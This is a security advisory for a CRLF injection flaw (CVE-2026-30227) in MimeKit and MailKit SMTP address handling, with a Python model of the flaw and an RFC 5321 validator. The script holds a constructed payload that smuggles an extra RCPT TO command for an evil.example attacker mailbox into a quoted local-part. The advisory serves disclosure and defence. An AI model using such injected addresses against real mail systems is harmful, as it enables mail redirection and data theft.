PT-2026-23616 · Mailkit+1 · Emailkit+1
Kc1Zs4 · Published 2026-03-05 · Updated 2026-03-07 · CVE-2026-30227
CVSS v4.0: 6.9 (Medium)
| Vector | AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N |
Name of the Vulnerable Software and Affected Versions
MimeKit versions prior to 4.15.1
MailKit versions prior to 4.15.1
Description
A CRLF injection flaw exists in MimeKit and MailKit when handling SMTP envelope addresses. When the local-part of an address is a quoted-string, the software does not reject carriage return and line feed characters (\r and \n), even though RFC 5321 prohibits them inside quoted-strings: the qtextSMTP and quoted-pairSMTP productions admit only printable ASCII and space. If an attacker controls a MailboxAddress value that is later serialized into an SMTP session, the embedded CRLF terminates the current command and the remainder of the address reaches the server as additional SMTP commands, such as RCPT TO, DATA, or RSET; depending on how the application uses MailKit/MimeKit, mail headers may be injected instead. The affected components are MimeKit and MailKit in versions prior to 4.15.1 (4.15.0 and earlier), together with any application that accepts untrusted input for sender or recipient addresses, constructs MailboxAddress objects from that input, and sends messages via SMTP. Exploitation can lead to mail redirection, data exfiltration, corruption of the SMTP transaction state, and potentially header injection or logging evasion.
Recommendations
Versions prior to 4.15.1 should be updated to version 4.15.1 or later.
Reject carriage return and line feed characters (\r and \n) in the local-part when parsing or constructing mailbox addresses used for SMTP envelopes.
Ensure quoted local-part parsing aligns with RFC 5321's qtextSMTP and quoted-pairSMTP ranges (qtextSMTP = %d32-33 / %d35-91 / %d93-126; quoted-pairSMTP = "\" followed by %d32-126), which exclude all control characters in both the escaped and unescaped positions.
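As an added illustration that is not part of this advisory or of the MailKit/MimeKit code base, the following Python models the flaw and the recommended check: a naive serializer that emits a RCPT TO command from an attacker-controlled quoted local-part, a line-oriented view of what the SMTP server then parses, and a local-part validator implementing RFC 5321's Dot-string/Quoted-string grammar. Python is used because the point is the protocol grammar rather than the .NET API; the function names, the sample addresses and the injected payload are constructed for the example, and SMTPUTF8 (RFC 6531) is assumed out of scope.

```python
"""Model of CRLF injection through a quoted SMTP local-part and the RFC 5321 check that stops it."""
from typing import List

# RFC 5321 section 4.1.2 character classes, transcribed from the RFC's ABNF.
ATEXT = set("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"
            "!#$%&'*+-/=?^_`{|}~")
# qtextSMTP = %d32-33 / %d35-91 / %d93-126 : printable ASCII and space, minus '"' and '\'
QTEXT_SMTP = ({chr(c) for c in range(32, 34)} | {chr(c) for c in range(35, 92)}
              | {chr(c) for c in range(93, 127)})
# quoted-pairSMTP = "\" %d32-126 : a backslash may escape any printable ASCII char or space
QUOTED_PAIR_TARGET = {chr(c) for c in range(32, 127)}


def local_part_is_valid(local_part: str) -> bool:
    """True iff local_part is an RFC 5321 Dot-string or Quoted-string.

    Every accepted class is a subset of %d32-126, so CR (0x0D), LF (0x0A) and
    every other control character are rejected in both forms, whether or not
    they sit behind a backslash escape.
    """
    if not local_part:
        return False
    if local_part[0] == '"':
        if len(local_part) < 2 or local_part[-1] != '"':
            return False
        body = local_part[1:-1]
        i = 0
        while i < len(body):
            if body[i] == "\\":
                # quoted-pairSMTP: the escaped byte must itself be printable
                if i + 1 >= len(body) or body[i + 1] not in QUOTED_PAIR_TARGET:
                    return False
                i += 2
            elif body[i] in QTEXT_SMTP:
                i += 1
            else:
                return False
        return True
    # Dot-string = Atom *("." Atom); empty atoms (leading, trailing or double dots) are invalid
    return all(atom and all(ch in ATEXT for ch in atom) for atom in local_part.split("."))


def naive_rcpt_command(local_part: str, domain: str) -> str:
    """Serialise a recipient the way an unpatched client does: no check on the local-part."""
    return f"RCPT TO:<{local_part}@{domain}>\r\n"


def hardened_rcpt_command(local_part: str, domain: str) -> str:
    """Same serialisation, but refuse anything RFC 5321 does not allow in a local-part."""
    if not local_part_is_valid(local_part):
        raise ValueError("local-part is not a valid RFC 5321 Dot-string or Quoted-string")
    return naive_rcpt_command(local_part, domain)


def hardened_rejects(local_part: str, domain: str) -> bool:
    """Convenience predicate: does the hardened serializer refuse this address?"""
    try:
        hardened_rcpt_command(local_part, domain)
    except ValueError:
        return True
    return False


def server_view(wire: str) -> List[str]:
    """What a line-oriented SMTP server parses: one command per CRLF-terminated line."""
    return [line for line in wire.split("\r\n") if line]


# Constructed attacker-controlled quoted local-part carrying an embedded RCPT TO command.
INJECTED_LOCAL_PART = '"victim\r\nRCPT TO:<attacker@evil.example>\r\nx"'


if __name__ == "__main__":
    wire = naive_rcpt_command(INJECTED_LOCAL_PART, "example.com")
    for cmd in server_view(wire):
        print(repr(cmd))
    # The middle line is a well-formed RCPT TO that the server honours; the first and
    # last lines are malformed and merely draw error replies.
    print("hardened serializer rejects payload:",
          hardened_rejects(INJECTED_LOCAL_PART, "example.com"))
```

Running the script shows the single attacker-supplied recipient turning into three server-side lines, the second of which is a complete RCPT TO for a different mailbox; the hardened serializer refuses the same input before anything is written to the socket. The validator is stricter than the advisory's minimum (it rejects every control character, not only CR and LF), which is what the RFC 5321 ranges require.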
Affected Products
MailKit
MimeKit